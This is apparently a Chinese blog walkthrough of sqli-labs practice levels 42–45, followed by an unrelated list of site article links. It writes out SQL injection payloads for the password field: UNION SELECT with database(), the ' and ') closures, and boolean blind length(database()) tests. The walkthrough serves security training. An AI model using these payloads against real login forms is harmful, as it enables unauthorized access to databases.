当前位置: 首页 > news >正文

sqli-labs靶场less40-less45

less42

1.我们打开靶场看一下

2.既然有登录框,那我们就抓包来注入,在密码之后进行注入

1'union select 1,2,3--+

3,接下来我们就可以进行数据库名的查询

1'union select 1,database(),3--+

4.剩下的部分和之前一样,只需要进行抓包在密码的地方注入即可

less43

1.这一关和上一关做法一样,只是闭合方式为’)

1')union select 1,database(),3--+

2.剩下的和上一关一样,只有闭合方法不同

less44

1.我们打开靶场看一下

2.我们在登录的时候进行抓包,然后再name和passwd后面都写为以下语句,当有一个的值不在为真时就会报错

1'and 1=1--+

3.当name的判断保持为真时,passwd的判断为真为假返回的内容不同,那我们就可以使用布尔盲注来判断,首先判断一下数据库名字的长度

1'or+length(database())>1--+
1'or+length(database())>8--+

4.剩下的步骤就可以使用这方法继续往下做

less45

1.这一关和上一关的区别在于闭合方式不同,变为了‘),爆长度的语句变为了

1')or+length(database())>1--+
1')or+length(database())>8--+

2.剩下内容与上一关的内容相差不多

http://www.lryc.cn/news/612159.html

相关文章:

  • 【python中级】关于Flask服务在同一系统里如何只被运行一次
  • 大型音频语言模型论文总结
  • 基于CentOS-7.6部署k8s-1.24.0,containerd作为CRI,nerdctl作为容器管理CLI
  • 高阶组件实现Button权限
  • 对 .NET线程 异常退出引发程序崩溃的反思
  • PowerShell部署Windows爬虫自动化方案
  • 玩转 InfluxDB 3:用 HTTP API 快速创建高效数据表
  • 【Linux】调试器gdb/cgdb的使用
  • 信号处理:信号产生
  • 张艺兴续约担任传音手机全球品牌代言人 携手共启创新征程
  • 企业级DDoS防护实战案例
  • 数字取证和网络安全:了解两者的交叉点和重要性
  • 什么是 Kafka 中的消息?它由哪些部分组成
  • 《设计模式之禅》笔记摘录 - 13.迭代器模式
  • JP3-4-MyClub后台前端(二)
  • leetcode 3479. 水果成篮 III 中等
  • 多端同步新解法:Joplin+cpolar联合通过开源设计实现跨平台无缝协作?
  • 【学习笔记之redis】删除缓存
  • vue3 el-select el-option 使用
  • 学习嵌入式之硬件——ARM体系
  • CubeFS存储(一)
  • 【前端开发】四. JS内置函数
  • [特殊字符]企业游学 | 探秘字节,解锁AI科技新密码
  • 【Linux】重生之从零开始学习运维之主从MGR高可用
  • 无人机航拍数据集|第6期 无人机垃圾目标检测YOLO数据集772张yolov11/yolov8/yolov5可训练
  • 【python】OpenCV—Defect Detection
  • AI浪潮下,FPGA如何实现自我重塑与行业变革
  • 深度模拟用户行为:用Playwright爬取B站弹幕与评论数据
  • 2025年高防IP隐身术:四层架构拆解源站IP“消失之谜”
  • 微算法科技(NASDAQ:MLGO)利用鸽群分散算法,提高区块链交易匹配算法效能